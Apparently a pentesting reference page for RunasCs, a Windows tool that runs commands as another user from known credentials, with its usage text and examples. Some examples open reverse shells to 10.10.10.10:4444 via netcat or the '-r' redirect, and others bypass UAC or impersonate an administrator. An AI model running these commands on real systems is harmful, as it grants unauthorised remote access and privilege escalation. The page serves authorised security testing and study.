RunasCS
(Thank you @numonce)
Overview:¶
Link: https://github.com/antonioCoco/RunasCs
Often times we have credentials for another user, but are unable to switch to or run commands as the user. RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credentials. This tool is an improved and open version of windows builtin runas.exe that solves some limitations:
- Allows explicit credentials
- Works both if spawned from interactive process and from service process
- Manage properly DACL for Window Stations and Desktop for the creation of the new process
- Uses more reliable create process functions like
CreateProcessAsUser()andCreateProcessWithTokenW()if the calling process holds the required privileges (automatic detection) - Allows to specify the logon type, e.g. 8-NetworkCleartext logon (no UAC limitations)
- Allows to bypass UAC when an administrator password is known (flag --bypass-uac)
- Allows redirecting stdin, stdout and stderr to a remote host
- It's Open Source :)
Usage¶
RunasCs v1.5 - @splinter_code
Usage:
RunasCs.exe username password cmd [-d domain] [-f create_process_function] [-l logon_type] [-r host:port] [-t process_timeout] [--force-profile] [--bypass-uac] [--remote-impersonation]
Description:
RunasCs is an utility to run specific processes under a different user account
by specifying explicit credentials. In contrast to the default runas.exe command
it supports different logon types and CreateProcess* functions to be used, depending
on your current permissions. Furthermore it allows input/output redirection (even
to remote hosts) and you can specify the password directly on the command line.
Positional arguments:
username username of the user
password password of the user
cmd commandline for the process
Optional arguments:
-d, --domain domain
domain of the user, if in a domain.
Default: ""
-f, --function create_process_function
CreateProcess function to use. When not specified
RunasCs determines an appropriate CreateProcess
function automatically according to your privileges.
0 - CreateProcessAsUserW
1 - CreateProcessWithTokenW
2 - CreateProcessWithLogonW
-l, --logon-type logon_type
the logon type for the token of the new process.
Default: "2" - Interactive
-t, --timeout process_timeout
the waiting time (in ms) for the created process.
This will halt RunasCs until the spawned process
ends and sent the output back to the caller.
If you set 0 no output will be retrieved and a
background process will be created.
Default: "120000"
-r, --remote host:port
redirect stdin, stdout and stderr to a remote host.
Using this option sets the process_timeout to 0.
-p, --force-profile
force the creation of the user profile on the machine.
This will ensure the process will have the
environment variables correctly set.
WARNING: If non-existent, it creates the user profile
directory in the C:\Users folder.
-b, --bypass-uac
try a UAC bypass to spawn a process without
token limitations (not filtered).
-i, --remote-impersonation
spawn a new process and assign the token of the
logged on user to the main thread.
Examples:
Run a command as a local user
RunasCs.exe user1 password1 "cmd /c whoami /all"
Run a command as a domain user and logon type as NetworkCleartext (8)
RunasCs.exe user1 password1 "cmd /c whoami /all" -d domain -l 8
Run a background process as a local user,
RunasCs.exe user1 password1 "C:\tmp\nc.exe 10.10.10.10 4444 -e cmd.exe" -t 0
Redirect stdin, stdout and stderr of the specified command to a remote host
RunasCs.exe user1 password1 cmd.exe -r 10.10.10.10:4444
Run a command simulating the /netonly flag of runas.exe
RunasCs.exe user1 password1 "cmd /c whoami /all" -l 9
Run a command as an Administrator bypassing UAC
RunasCs.exe adm1 password1 "cmd /c whoami /priv" --bypass-uac
Run a command as an Administrator through remote impersonation
RunasCs.exe adm1 password1 "cmd /c echo admin > C:\Windows\admin" -l 8 --remote-impersonation